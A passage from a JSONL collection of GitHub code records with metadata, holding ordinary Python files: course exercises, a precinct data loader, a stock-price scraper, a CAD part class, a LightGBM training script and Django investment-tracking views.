\"apple\"]\n\nstock = {\n \"banana\": 6,\n \"apple\": 0,\n \"orange\": 32,\n \"pear\": 15\n}\n \nprices = {\n \"banana\": 4,\n \"apple\": 2,\n \"orange\": 1.5,\n \"pear\": 3\n}\n\ndef compute_bill(food):\n total = 0\n for item in food:\n if stock[item] > 0:\n total += prices[item]\n stock[item] -= 1\n return total\n","repo_name":"chloenh/Codecademy-Python","sub_path":"stockingout-solution.py","file_name":"stockingout-solution.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43471764647","text":"# lec6.5-dictionaries.py\n# edX MITx 6.00.1x\n# Introduction to Computer Science and Programming Using Python\n# Lecture 6, video 5\n\n# Demonstration of dictionaries\n# Dict is a list, but now has indices, don't have to be integers\n# Dict is a collection of pairs\n# Refer to indices as keys, keys must be imutable\n\n# NOTE: Entries in dictionaries are unordered, can only be accessed\n# by key, not be index\n\nmonthNumbers = {'Jan':1, 'Feb':2, 'Mar':3, 1:'Jan', 2:'Feb', 3:'Mar'}\n\n# Examples of retrieving entries in the dictionary using its key\nmonthNumbers['Jan']\nmonthNumbers[1]\n\n# Can perform insertion. 'Apr' is the key, 4 is the value\nmonthNumbers ['Apr'] = 4\n\n# Can iterate through dictionaries\ncollect = []\nfor e in monthNumbers:\n # Iterate through each item in monthNumbers, append the key to collect\n collect.append(e)\nprint (collect)\n\n# Can compare value of dictionary collect with the keys in monthNumbers\nprint (monthNumbers.keys())\n","repo_name":"slgraff/edx-mitx-6.00.1x","sub_path":"lec6.5-dictionaries.py","file_name":"lec6.5-dictionaries.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"28388003908","text":"import os.path\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\nfrom base import Model, Collection, DATA_DIRECTORY\nfrom csv import DictReader\n\nCOOK_SUBURBAN_PRECINCT_CSV_FILENAME = os.path.join(\n DATA_DIRECTORY, 'cook_suburban_precincts_as_of_2016.csv')\nCOOK_SUBURBAN_PRECINCT_TRACT_CROSSWALK_CSV_FILENAME = os.path.join(\n DATA_DIRECTORY, 'suburban_cook_precinct_census_tract_crosswalk.csv')\n\nclass CookSuburbanPrecinct(Model):\n fields = [\n 'town',\n 'precinctid',\n 'objectid'\n ]\n\n def __str__(self):\n return self.precinctid\n\n def __repr__(self):\n return \"CookSuburbanPrecinct(town='{pc.town}', precinctid='{pc.precinctid}', objectid='{pc.objectid}'')\".format(\n pc=self)\n\n\nclass CookSuburbanPrecinctCollection(Collection):\n model = CookSuburbanPrecinct\n\n def __init__(self):\n self._by_precinct_id = {}\n self._by_town_name = {}\n self._by_object_id = {}\n super(CookSuburbanPrecinctCollection, self).__init__()\n\n def add_item(self, item):\n super(CookSuburbanPrecinctCollection, self).add_item(item)\n self._by_precinct_id[item.precinctid] = item\n self._by_object_id[item.objectid] = item\n if item.town.lower() not in self._by_town_name:\n self._by_town_name[item.town.lower()] = []\n self._by_town_name[item.town.lower()].append(item)\n\n def transform_row(self, row):\n return {\n 'town': row['name'],\n 'precinctid': str(row['idpct']),\n 'objectid': row['objectid']\n }\n\n def get_by_town_name(self, name):\n return self._by_town_name.get(str(name).lower(), None)\n\n def get_by_precinct_id(self, precinctid):\n return self._by_precinct_id.get(str(precinctid), None)\n\n def get_by_object_id(self, object_id):\n return self._by_object_id.get(str(object_id), None)\n\n def default_sort(self):\n self._items = sorted(self._items, key=lambda pc: int(pc.precinctid))\n return self\n\n\nCOOK_SUBURBAN_PRECINCTS = CookSuburbanPrecinctCollection().from_csv(\n COOK_SUBURBAN_PRECINCT_CSV_FILENAME)\n\n# HACK - this seems duplicative with Chicago precinct crosswalk\nCOOK_SUBURBAN_CROSSWALK = []\nwith open(COOK_SUBURBAN_PRECINCT_TRACT_CROSSWALK_CSV_FILENAME) as fh:\n reader = DictReader(fh)\n for row in reader:\n COOK_SUBURBAN_CROSSWALK.append(row)\n\ndef get_suburban_cook_precincts_from_tract_geoid(geoid, precinct_key='precinct_objectid'):\n precinct_ids = []\n for row in COOK_SUBURBAN_CROSSWALK:\n if row['tract_geoid'] == str(geoid):\n precinct_ids.append(row.get(precinct_key, None))\n return precinct_ids\n\ndef get_suburban_cook_tract_from_precinct_number(precinct_id, precinct_key='precinct_objectid'):\n for row in COOK_SUBURBAN_CROSSWALK:\n if row.get(precinct_key, None) == str(precinct_id):\n return row['tract_geoid']\n return None","repo_name":"newsapps/python-chicago","sub_path":"chicago/cook_suburbs/precincts.py","file_name":"precincts.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"15346892044","text":"# just an extension of LCS\n\n# Top down approach\ndef dp(l1,l2,s,t,cache):\n \n if not l1 or not l2:\n return \"\"\n elif cache.get((l1,l2)):\n return cache[(l1,l2)]\n else:\n \n if s[l1-1]==t[l2-1]:\n cache[(l1,l2)]=dp(l1-1,l2-1,s,t,cache)+s[l1-1]\n return cache[(l1,l2)]\n \n else:\n sub1,sub2=dp(l1-1,l2,s,t,cache),dp(l1,l2-1,s,t,cache)\n cache[(l1,l2)]=sub1 if len(sub1)>=len(sub2) else sub2\n return cache[(l1,l2)]\n\n\n\n\nA,B=input().split()\nm,n=len(A),len(B)\nprint(dp(m,n,A,B,{}))\n\n\n# below is bottom-up approach.\n\"\"\"dp=[[\"\"]*(n+1) for _ in range(m+1)]\nfor i in range(1,m+1):\n for j in range(1,n+1):\n if A[i-1]==B[j-1]:\n dp[i][j]=dp[i-1][j-1]+B[j-1]\n else:\n if len(dp[i-1][j])>len(dp[i][j-1]):\n dp[i][j]=dp[i-1][j]\n else:\n dp[i][j]=dp[i][j-1]\nprint(dp[-1][-1])\"\"\"","repo_name":"faisal-git/Data_Structure","sub_path":"DP/print_LCS.py","file_name":"print_LCS.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33156943666","text":"A = [10, 2, 5, 1, 8, 20]\nsample1 = [6, 1, 6, 5, 8, 4]\nsample2 = [2, 20, 7, 55, 1, 33, 12, 4]\nsample3 = [33, 6, 20, 1, 8, 12, 5, 55, 4, 9]\nsample4 = [1, 2, 3, 4, 5, 10]\n\n\ndef solution(A):\n max_peri = 0\n n = len(A)\n A.sort(reverse=True)\n\n for i in range(0, n - 2):\n if A[i] < (A[i + 1] + A[i + 2]):\n max_peri = max(max_peri, A[i] + A[i + 1] + A[i + 2])\n break\n if max_peri == 0:\n return -1\n else:\n return max_peri\n\n\nprint(solution(A))\nprint(solution(sample1))\nprint(solution(sample2))\nprint(solution(sample3))\n\nprint(solution(sample4))\n","repo_name":"laoliucn/PythonLearning","sub_path":"maxPerimeter.py","file_name":"maxPerimeter.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23541982356","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 종목 코드 리스트\nCodes = [\n '005930',\n '000660',\n '035720'\n]\nfor Code in Codes : \n url = f\"https://finance.naver.com/item/sise.naver?code={Code}\"\n\n # requests 라이브러리에 get 함수를 사용해서 사이트 요청 하기 (해당 url사이트로 get 요청이감)\n # ->반환된 응답을 \"response\" 변수에 저장하기 \n response = requests.get(url)\n\n # 응답 받은 내용 html 코드 문서로 만들기(. text를 사용해 문자 내용만 가져오기)\n # 받은 html 코드는 문자이기 떄문에 파씽하기가 어려움\n html = response.text\n\n # 때문에 받은 html 문서에 속성값 인지 할 수 있게 BeautifulSoup로 만들기\n # BeautifulSoup(첫번째 인자 = response.text , 두번째 인자 = \"html.parser\" ) \n soup = BeautifulSoup(html,\"html.parser\")\n\n # 문자열 형태로 CSS 선택자를 써준다 \n price = soup.select_one(\"#_nowVal\").text \n\n # replace 함수(문자열 교체함수)를 사용해서 원하는 문자열 변경 \n # => .replace( \" 변경 할 문자 \" , \" 변경되는 문자 \")\n price = price.replace(\",\",\"\")\n\n print(price)","repo_name":"Jaeil-Lee/1_Grade","sub_path":"1_Semester/Python/2. Personal learning/02. 인프런/02. 네이버_주식현재가_크롤링/01. 데이터 추출.py","file_name":"01. 데이터 추출.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25932241034","text":"from typing import List, Optional\nfrom padam.parts import Part\nfrom padam.parts.panel import Panel\nfrom solid import OpenSCADObject, rotate\nfrom solid.utils import back, right, up\n\n\nclass Frame(Part):\n def __init__(\n self,\n length: Optional[int] = 1200,\n height: Optional[int] = 700,\n depth: Optional[int] = 600,\n thickness: Optional[float] = 18,\n material: Optional[str] = None,\n top_thickness: Optional[float] = None,\n bottom_thickness: Optional[float] = None,\n side_thickness: Optional[float] = None,\n top_material: Optional[str] = None,\n bottom_material: Optional[str] = None,\n side_material: Optional[str] = None,\n top_slitted: Optional[bool] = True,\n top_front_depth: Optional[int] = 100,\n top_back_depth: Optional[int] = 100,\n name: Optional[str] = None,\n ):\n super().__init__(name=name)\n self.length = length\n self.height = height\n self.depth = depth\n self.top_thickness = top_thickness or thickness\n self.bottom_thickness = bottom_thickness or thickness\n self.side_thickness = side_thickness or thickness\n self.top_material = top_material or material\n self.bottom_material = bottom_material or material\n self.side_material = side_material or material\n self.top_slitted = top_slitted\n self.top_front_depth = top_front_depth\n self.top_back_depth = top_back_depth\n # calculated attributes\n self.interior_length: float = self.length - 2 * self.side_thickness\n self.interior_height: float = self.height - self.top_thickness - self.bottom_thickness\n # parts\n self.top_panel = self.add_part(Panel(self.interior_length, self.depth, self.top_thickness, name='top_panel', material=self.top_material))\n self.bottom_panel = self.add_part(Panel(self.interior_length, self.depth, self.bottom_thickness, name='bottom_panel', material=self.bottom_material))\n self.left_panel = self.add_part(Panel(self.height, self.depth, self.side_thickness, name='left_panel', material=self.side_material))\n self.right_panel = self.add_part(Panel(self.height, self.depth, self.side_thickness, name='right_panel', material=self.side_material))\n\n def get_objects(self) -> List[OpenSCADObject]:\n top_panel = up(self.height - self.top_thickness)(self.top_panel.get_object())\n bottom_panel = self.bottom_panel.get_object()\n left_panel = rotate([0, -90, 0])(self.left_panel.get_object())\n right_panel = right(self.length - self.side_thickness)(rotate([0, -90, 0])(self.right_panel.get_object()))\n panels = [top_panel, bottom_panel, left_panel, right_panel]\n panels = [right(self.side_thickness)(p) for p in panels]\n panels = [back(self.depth)(p) for p in panels]\n return panels\n\n def get_params(self) -> List[tuple]:\n return super().get_params() + [\n ('length', self.length),\n ('height', self.height),\n ('depth', self.depth),\n ('top_thickness', self.top_thickness),\n ('bottom_thickness', self.bottom_thickness),\n ('side_thickness', self.side_thickness),\n ('top_material', self.top_material),\n ('bottom_material', self.bottom_material),\n ('side_material', self.side_material),\n ]\n","repo_name":"madron/padam","sub_path":"padam/parts/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73608456107","text":"import xlwt\nimport urllib\nimport json\n\nfrom django.views import View\nfrom django.http import JsonResponse, HttpResponse\nfrom django.utils import timezone\nfrom django.db.models import Sum, Q, Prefetch\nfrom django.db import transaction, IntegrityError\n\nfrom users.utils import user_validator\nfrom investments.utils import Portfolio\nfrom investments.models import PaybackSchedule, UserDeal, UserPayback\nfrom deals.models import Deal\nfrom users.models import User\n\nclass InvestmentHistoryView(View):\n @user_validator\n def get(self, request):\n try:\n signed_user = request.user\n PAGE_SIZE = 10\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', PAGE_SIZE)) + offset\n status = request.GET.get('status', None)\n search = request.GET.get('search', None)\n user_deals = UserDeal.objects.filter(user=signed_user).select_related('deal')\n q = Q()\n\n count_by_status = {\"all\": len(user_deals)}\n\n for deal_status in Deal.Status.__members__:\n count_by_status[Deal.Status[deal_status]] = len(user_deals.filter(deal__status=Deal.Status[deal_status]))\n\n if status:\n q &= Q(deal__status=status)\n\n if search:\n q &= Q(deal__name__contains=search) | Q(deal__id__contains=search)\n\n investments = user_deals.filter(q).prefetch_related(\n Prefetch('userpayback_set', to_attr='paybacks'),\n Prefetch('userpayback_set', queryset=UserPayback.objects.filter(state=UserPayback.State.PAID.value), to_attr='paid_paybacks')\n )\n\n summary = {\n \"total\" : sum(investment.amount for investment in investments),\n \"paidTotal\" : investments.filter(userpayback__state=UserPayback.State.PAID.value)\\\n .aggregate(paid_total=Sum('userpayback__principal'))['paid_total'],\n \"paidInterest\": investments.filter(userpayback__state=UserPayback.State.PAID.value)\\\n .aggregate(paid_interest=Sum('userpayback__interest'))['paid_interest']\n }\n\n items = [\n {\n \"id\" : investment.id,\n \"dealIndex\" : investment.deal.id,\n \"item\" : investment.deal.name,\n \"amount\" : investment.amount,\n \"principal\" : sum(payback.principal for payback in investment.paybacks),\n \"interest\" : sum(payback.interest for payback in investment.paybacks),\n \"date\" : timezone.localtime(investment.created_at).strftime(\"%y.%m.%d\"),\n \"grade\" : Deal.Grade(investment.deal.grade).label,\n \"interestRate\": investment.deal.earning_rate,\n \"term\" : investment.deal.repayment_period,\n \"status\" : investment.deal.status,\n \"repayment\" : int((sum(paid_payback.principal for paid_payback in investment.paid_paybacks) / investment.amount) * 100),\n \"cycle\" : len(investment.paid_paybacks),\n \"isCancelable\": investment.created_at + timezone.timedelta(days=1) < timezone.now(),\n } for investment in investments.order_by('-created_at')[offset:limit]\n ]\n return JsonResponse({\"summary\":summary,\"count\": count_by_status, \"items\":items}, status=200)\n\n except ValueError:\n return JsonResponse({\"message\":'VALUE_ERROR'}, status=400)\n\nclass InvestmentPortfolioView(View):\n @user_validator\n def get(self, request):\n user = request.user\n\n user_deals = list(user.userdeal_set.all().prefetch_related('deal'))\n\n portfolio = Portfolio()\n\n for user_deal in user_deals:\n portfolio.sort_deal(user_deal)\n\n results = {\n 'grade' : portfolio.grade,\n 'earningRate' : portfolio.earning_rate,\n 'category' : portfolio.category\n }\n \n return JsonResponse({\"results\": results}, status=200)\n\nclass InvestmentSummaryView(View):\n @user_validator\n def get(self, request):\n user = request.user\n \n user_deals_by_status = {}\n for deal_status in Deal.Status.__members__:\n user_deals_by_status[deal_status] = user.userdeal_set.filter(\n Q(deal__status = Deal.Status[deal_status])\n ).prefetch_related(\n Prefetch(\n 'userpayback_set',\n queryset = UserPayback.objects.all(),\n to_attr = 'all_paybacks'\n ),\n Prefetch(\n 'userpayback_set',\n queryset = UserPayback.objects.filter(state=UserPayback.State.PAID.value),\n to_attr = 'paid_paybacks'\n ),\n )\n\n user_deals_by_status_sums = {}\n for key, filtered_user_deals in user_deals_by_status.items():\n user_deals_by_status_sums[key] = {\n 'total_amount' : int(filtered_user_deals.aggregate(Sum('amount'))['amount__sum'] or 0),\n 'total_interest' : sum(sum(payback.interest for payback in user_deal.all_paybacks) for user_deal in filtered_user_deals),\n 'total_commission' : sum(sum(payback.commission for payback in user_deal.all_paybacks) for user_deal in filtered_user_deals),\n 'paid_principal' : sum(sum(payback.principal for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals),\n 'paid_interest' : sum(sum(payback.interest for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals),\n 'paid_commission' : sum(sum(payback.commission for payback in user_deal.paid_paybacks) for user_deal in filtered_user_deals)\n }\n\n applying_invest_amount = user_deals_by_status_sums['APPLYING']['total_amount'] - \\\n user_deals_by_status_sums['APPLYING']['paid_principal']\n normal_invest_amount = user_deals_by_status_sums['NORMAL']['total_amount'] - \\\n user_deals_by_status_sums['NORMAL']['paid_principal']\n delay_invest_amount = user_deals_by_status_sums['DELAY']['total_amount'] - \\\n user_deals_by_status_sums['DELAY']['paid_principal']\n overdue_invest_amount = user_deals_by_status_sums['OVERDUE']['total_amount'] - \\\n user_deals_by_status_sums['OVERDUE']['paid_principal']\n nonperform_invest_amount = user_deals_by_status_sums['NONPERFORM']['total_amount'] - \\\n user_deals_by_status_sums['NONPERFORM']['paid_principal']\n loss_amount = user_deals_by_status_sums['NONPERFORM_COMPLETION']['total_amount'] - \\\n user_deals_by_status_sums['NONPERFORM_COMPLETION']['paid_principal']\n\n invested_amount = sum(value['total_amount'] for value in user_deals_by_status_sums.values())\n complete_amount = sum(value['paid_principal'] for value in user_deals_by_status_sums.values())\n invest_amount = applying_invest_amount + normal_invest_amount + delay_invest_amount + \\\n overdue_invest_amount + nonperform_invest_amount\n\n paid_revenue = sum(value['paid_interest'] for value in user_deals_by_status_sums.values()) - \\\n sum(value['paid_commission'] for value in user_deals_by_status_sums.values())\n\n total_revenue = sum(value['total_interest'] for value in user_deals_by_status_sums.values()) - \\\n sum(value['total_commission'] for value in user_deals_by_status_sums.values())\n \n mortgage_deals = user.userdeal_set.filter(\n Q(deal__category=Deal.Category.MORTGAGE.value)\n ).prefetch_related(\n Prefetch('userpayback_set', queryset=UserPayback.objects.filter(~Q(state=UserPayback.State.PAID.value)), to_attr='left_paybacks')\n )\n \n invest_mortgage_amount = sum(sum(payback.principal for payback in mortgage_deal.left_paybacks) for mortgage_deal in mortgage_deals)\n\n deposit = {\n 'bank' : user.deposit_bank.name,\n 'account' : user.deposit_account,\n 'balance' : user.deposit_amount\n }\n\n invest_limit = {\n 'total' : user.net_invest_limit,\n 'remainTotal' : user.net_invest_limit - invest_amount,\n 'remainEstate' : user.net_mortgage_invest_limit - invest_mortgage_amount \n }\n\n overview = {\n 'earningRate' : round((total_revenue - loss_amount) / complete_amount * 100, 2),\n 'asset' : user.deposit_amount + invest_amount,\n 'paidRevenue' : paid_revenue\n }\n\n invest_status = {\n 'totalInvest' : invested_amount,\n 'complete' : complete_amount,\n 'delay' : delay_invest_amount,\n 'invest' : invest_amount,\n 'loss' : loss_amount,\n 'normal' : normal_invest_amount + applying_invest_amount,\n 'overdue' : overdue_invest_amount,\n 'nonperform' : nonperform_invest_amount\n }\n\n results = {\n 'deposit' : deposit,\n 'investLimit' : invest_limit,\n 'overview' : overview,\n 'investStatus' : invest_status\n }\n\n return JsonResponse({\"results\": results}, status=200)\n \nclass XlsxExportView(View):\n @user_validator\n def get(self, request):\n filename = urllib.parse.quote(\n f'[{timezone.localdate().strftime(\"%Y-%m-%d\")}] 투자 내역 다운로드.xlsx'.encode('utf-8')\n )\n response = HttpResponse(content_type=\"application/vnd.ms-excel\")\n response[\"Content-Disposition\"] = 'attachment;filename*=UTF-8\\'\\'%s' % filename\n wb = xlwt.Workbook(encoding='ansi')\n ws = wb.add_sheet('투자내역')\n signed_user = request.user\n\n row_number = 0\n column_names = [\n '투자일',\n '상품호수', \n '상품명', \n '등급', \n '예상수익률(%)', \n '투자기간(개월)', \n '투자금액', \n '지급받은 원금', \n '지급받은 이자',\n '세금', \n '커미션'\n ]\n\n for index, column_name in enumerate(column_names):\n ws.write(row_number, index, column_name)\n\n\n investments = UserDeal.objects.filter(user=signed_user).select_related('deal').prefetch_related(\n Prefetch('userpayback_set', to_attr='paybacks'),\n Prefetch(\n 'userpayback_set', \n queryset=UserPayback.objects.filter(state=UserPayback.State.PAID.value), \n to_attr='paid_paybacks')\n )\n\n rows = [\n [\n timezone.localtime(investment.created_at).strftime(\"%Y-%m-%d\"),\n investment.id,\n investment.deal.name,\n Deal.Grade(investment.deal.grade).label,\n investment.deal.earning_rate,\n investment.deal.repayment_period,\n investment.amount,\n sum(paid_payback.principal for paid_payback in investment.paid_paybacks),\n sum(paid_payback.interest for paid_payback in investment.paid_paybacks),\n sum(paid_payback.tax for paid_payback in investment.paid_paybacks),\n sum(paid_payback.commission for paid_payback in investment.paid_paybacks)\n ] for investment in investments\n ]\n\n for row in rows:\n row_number +=1\n for column_number, attribute in enumerate(row):\n ws.write(row_number, column_number, attribute)\n\n wb.save(response)\n\n return response\n\nclass InvestmentDealView(View):\n @user_validator\n def post(self, request):\n try:\n user = request.user\n data = json.loads(request.body)\n\n user_deals = []\n for deal_data in data['investments']:\n deal = Deal.objects.get(id=deal_data['id'], status=Deal.Status.APPLYING.value)\n amount = deal_data['amount']\n payback_schedule = PaybackSchedule.objects.filter(deal=deal, option=amount)\n\n if not payback_schedule:\n return JsonResponse({\"message\": \"INVALID_OPTION\"}, status=400) \n\n user_deal = {\n 'deal' : deal,\n 'amount' : amount,\n 'payback_schedule': payback_schedule\n }\n user_deals.append(user_deal)\n\n with transaction.atomic():\n for user_deal in user_deals:\n\n userdeal = UserDeal.objects.create(\n deal = user_deal['deal'],\n user = user,\n amount = user_deal['amount']\n )\n\n UserPayback.objects.bulk_create([\n UserPayback(\n users_deals = userdeal,\n principal = payback.principal,\n interest = payback.interest,\n tax = payback.tax,\n commission = payback.commission,\n payback_round = payback.payback_round,\n state = UserPayback.State.TOBE_PAID.value,\n payback_date = payback.payback_date\n ) for payback in user_deal['payback_schedule']\n ])\n\n\n return JsonResponse({\"message\": \"SUCCESS\"}, status=201)\n\n except KeyError:\n return JsonResponse({\"message\": \"KEY_ERROR\"}, status=400)\n\n except Deal.DoesNotExist:\n return JsonResponse({\"message\": \"INVALID_DEAL\"}, status=400)\n \n except IntegrityError:\n return JsonResponse({\"message\": \"INVESTD_DEAL\"}, status=400)\n \n @user_validator\n def get(self, request):\n try:\n user = request.user\n deals_id = request.GET.get('deals').split(\",\")\n deals = Deal.objects.filter(id__in=deals_id)\n\n invest_info = [{\n \"id\" : deal.id,\n \"name\" : deal.name,\n \"category\" : Deal.Category(deal.category).label,\n \"grade\" : Deal.Grade(deal.grade).label,\n \"earningRate\" : deal.earning_rate,\n \"repaymentPeriod\" : deal.repayment_period,\n \"amount\" : deal.userdeal_set.aggregate(total_price=Sum('amount'))['total_price'] or 0,\n \"investmentOption\": [option.value for option in PaybackSchedule.Option]\n } for deal in deals]\n\n results = {\n 'investInfo' : invest_info,\n 'depositAmount' : user.deposit_amount,\n 'name' : user.name,\n 'depositBank' : user.deposit_bank.name,\n 'depositAccount' : user.deposit_account,\n }\n\n return JsonResponse({\"results\" : results}, status=200)\n except Deal.DoesNotExist: \n return JsonResponse({\"message\":\"INVALID_ERROR\"}, status=400)\n","repo_name":"JeonSoohyun27/PROJECT-22percent","sub_path":"investments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34255698281","text":"import pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nfrom lightgbm.sklearn import LGBMClassifier\nfrom collections import defaultdict\nimport gc\nimport time\nfrom sklearn.decomposition import PCA\nfrom gensim.models import Word2Vec\nimport random\npd.set_option('display.max_columns', None)\n\nnp.random.seed(2021)\n\ndef reduce_mem(df, cols):\n start_mem = df.memory_usage().sum() / 1024 ** 2\n for col in tqdm(cols):\n col_type = df[col].dtypes\n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n\n end_mem = df.memory_usage().sum() / 1024 ** 2\n print('{:.2f} Mb, {:.2f} Mb ({:.2f} %)'.format(start_mem, end_mem, 100 * (start_mem - end_mem) / start_mem))\n gc.collect()\n return df\n\n## 从官方baseline里面抽出来的评测函数\ndef uAUC(labels, preds, user_id_list):\n \"\"\"Calculate user AUC\"\"\"\n user_pred = defaultdict(lambda: [])\n user_truth = defaultdict(lambda: [])\n for idx, truth in enumerate(labels):\n user_id = user_id_list[idx]\n pred = preds[idx]\n truth = labels[idx]\n user_pred[user_id].append(pred)\n user_truth[user_id].append(truth)\n user_flag = defaultdict(lambda: False)\n for user_id in set(user_id_list):\n truths = user_truth[user_id]\n flag = False\n # 若全是正样本或全是负样本,则flag为False\n for i in range(len(truths) - 1):\n if truths[i] != truths[i + 1]:\n flag = True\n break\n user_flag[user_id] = flag\n total_auc = 0.0\n size = 0.0\n for user_id in user_flag:\n if user_flag[user_id]:\n auc = roc_auc_score(np.asarray(user_truth[user_id]), np.asarray(user_pred[user_id]))\n total_auc += auc\n size += 1.0\n user_auc = float(total_auc)/size\n return user_auc\n\ny_list = ['read_comment', 'like', 'click_avatar', 'forward', 'favorite', 'comment', 'follow']\nmax_day = 15\n\n##\n\ncross = pd.read_pickle('extract_feature_cross.pkl')\nhistory = pd.read_pickle('extract_feature_history.pkl')\nembedding = pd.read_pickle('extract_feature_embedding.pkl')\n# embedding_10 = pd.read_pickle('extract_feature_embedding_10.pkl')\nfeedemb = pd.read_pickle('extract_feature_feedemb.pkl')\n# deepwalk = pd.read_pickle('extract_feature_deepwalk.pkl')\n\ndf = pd.concat([history,cross,feedemb,embedding],axis=1)\nprint('read finish')\n\n\nprint(df[:4],df[-4:])\n\nplay_cols = ['is_finish', 'play_times','play', 'stay']\n# # 内存够用的不需要做这一步\n# df = reduce_mem(df, [f for f in df.columns if f not in ['date_'] + play_cols + y_list])\n# print(df[:4])\ntrain = df[~df['read_comment'].isna()].reset_index(drop=True)\ntest = df[df['read_comment'].isna()].reset_index(drop=True)\ncols = [f for f in df.columns if f not in ['date_']+ play_cols + y_list]\ndf = df.fillna(0)\n\n\ndel df\ngc.collect()\n\n# + play_cols + y_list]\nprint(train[cols].shape)\nprint(cols)\n\ntrn_x = train[train['date_'] < 14].reset_index(drop=True)\nval_x = train[train['date_'] == 14].reset_index(drop=True)\n\n\n##################### 线下验证 #####################\nuauc_list = []\nr_list = []\nfor y in y_list[:4]:\n print('=========', y, '=========')\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"Feature\"] = cols\n t = time.time()\n clf = LGBMClassifier(\n learning_rate=0.01,\n n_estimators=5000,\n num_leaves=63,\n subsample=0.8,\n colsample_bytree=0.8,\n random_state=2021,\n metric='None',\n )\n clf.fit(\n trn_x[cols], trn_x[y],\n eval_set=[(val_x[cols], val_x[y])],\n eval_metric='auc',\n early_stopping_rounds=100,\n verbose=50\n )\n fold_importance_df[f'imp'] = clf.feature_importances_\n val_x[y + '_score'] = clf.predict_proba(val_x[cols])[:, 1]\n val_uauc = uAUC(val_x[y], val_x[y + '_score'], val_x['userid'])\n uauc_list.append(val_uauc)\n print(val_uauc)\n fold_importance_df.sort_values(by='imp', ascending=False, inplace=True)\n print(fold_importance_df[['Feature', 'imp']])\n r_list.append(clf.best_iteration_)\n print('runtime: {}\\n'.format(time.time() - t))\nweighted_uauc = 0.4 * uauc_list[0] + 0.3 * uauc_list[1] + 0.2 * uauc_list[2] + 0.1 * uauc_list[3]\nprint(uauc_list)\nprint(weighted_uauc)\ndel trn_x ,val_x\ngc.collect()\n##################### 全量训练 #####################\nr_dict = dict(zip(y_list[:4], r_list))\nfor y in y_list[:4]:\n print('=========', y, '=========')\n t = time.time()\n clf = LGBMClassifier(\n learning_rate=0.01,\n n_estimators=r_dict[y],\n num_leaves=63,\n subsample=0.8,\n colsample_bytree=0.8,\n random_state=2021,\n metric='auc',\n )\n clf.fit(\n train[cols], train[y],\n eval_set=[(train[cols], train[y])],\n early_stopping_rounds=r_dict[y],\n eval_metric='auc',\n verbose=100\n )\n test[y] = clf.predict_proba(test[cols])[:, 1]\n print('runtime: {}\\n'.format(time.time() - t))\ntest[['userid', 'feedid'] + y_list[:4]].to_csv('sub_%.6f_%.6f_%.6f_%.6f_%.6f.csv' % (weighted_uauc, uauc_list[0], uauc_list[1], uauc_list[2], uauc_list[3]),\n index=False\n)\n\n","repo_name":"6115925/BDC2021-WeiXin","sub_path":"LGB/lgb.py","file_name":"lgb.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13757212426","text":"def max_n(l):\n max_num = l[0]\n for i in range(1, len(l)):\n if max_num < l[i]:\n max_num = l[i]\n\n return max_num\n\n\ndef min_n(l):\n min_num = l[0]\n for i in range(1, len(l)):\n if l[i] < min_num:\n min_num = l[i]\n\n return min_num\n\n\ndef min_index(l):\n min_idx = 0\n for i in range(1, len(l)):\n if l[i] < l[min_idx]:\n min_idx = i\n\n return min_idx\n\n\n\ndef max_index(l):\n max_index = 0\n for i in range(1, len(l)):\n if l[max_index] < l[i]:\n max_index = i\n\n return max_index\n\n\ndef input_number():\n n = None\n l = []\n while n != 0:\n n = int(input('Enter a number: '))\n l.append(n)\n l.pop()\n\n return l\n\n\n\n\n\n\nif __name__ == '__main__':\n l = input_number()\n print('List is', l)\n print('Max Number:', max_n(l))\n print('Max Index:', max_index(l))\n print('Min Number:', min_n(l))\n print('Min Index:', min_index(l))\n\n","repo_name":"bizelite/algorithm","sub_path":"everyone/max_number.py","file_name":"max_number.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2791357327","text":"## Import statements\nimport argparse\nimport 